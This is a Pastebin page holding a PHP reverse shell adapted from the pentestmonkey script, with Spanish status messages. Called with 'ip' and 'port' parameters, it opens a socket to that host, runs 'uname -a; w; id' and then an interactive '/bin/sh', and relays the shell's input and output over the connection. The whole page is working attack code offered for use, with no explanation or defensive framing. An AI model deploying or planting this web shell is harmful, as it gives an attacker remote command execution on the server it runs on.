Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- if (isset($_GET['ip']) && isset($_GET['port'])) {
- #by http://pentestmonkey.net/
- set_time_limit(0);
- $write_a = null;
- $error_a = null;
- $daemon = 0;
- $debug = 0;
- $chunk_size = 1400;
- $host= $_GET['ip'];
- $port = $_GET['port'];
- $comando='uname -a; w; id; /bin/sh -i';
- $socks = fsockopen($host, $port, $errno, $errstr, 30);
- if (!$socks) {
- printit("$errstr ($errno)");
- exit(1);
- }
- $descriptorspec = array(
- 0 => array("pipe", "r"),
- 1 => array("pipe", "w"),
- 2 => array("pipe", "w")
- );
- $process=proc_open($comando,$descriptorspec,$pipes);
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($socks, 0);
- echo '<script>alert("Conectado a '. $host .'");</script>';
- while (1) {
- if (feof($socks)) {
- printit("ERROR: Shell [*] Connection Terminada");
- break;
- }
- if (feof($pipes[1])) {
- printit("ERROR: Shell [*] Proceso Terminado");
- break;
- }
- $read_a = array($socks, $pipes[1], $pipes[2]);
- $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- if (in_array($socks, $read_a)) {
- if ($debug) printit("SOCK READ");
- $input = fread($socks, $chunk_size);
- if ($debug) printit("SOCK: $input");
- fwrite($pipes[0], $input);
- }
- if (in_array($pipes[1], $read_a)) {
- if ($debug) printit("STDOUT READ");
- $input = fread($pipes[1], $chunk_size);
- if ($debug) printit("STDOUT: $input");
- fwrite($socks, $input);
- }
- if (in_array($pipes[2], $read_a)) {
- if ($debug) printit("STDERR READ");
- $input = fread($pipes[2], $chunk_size);
- if ($debug) printit("STDERR: $input");
- fwrite($socks, $input);
- }
- }
- fclose($socks);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process); }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement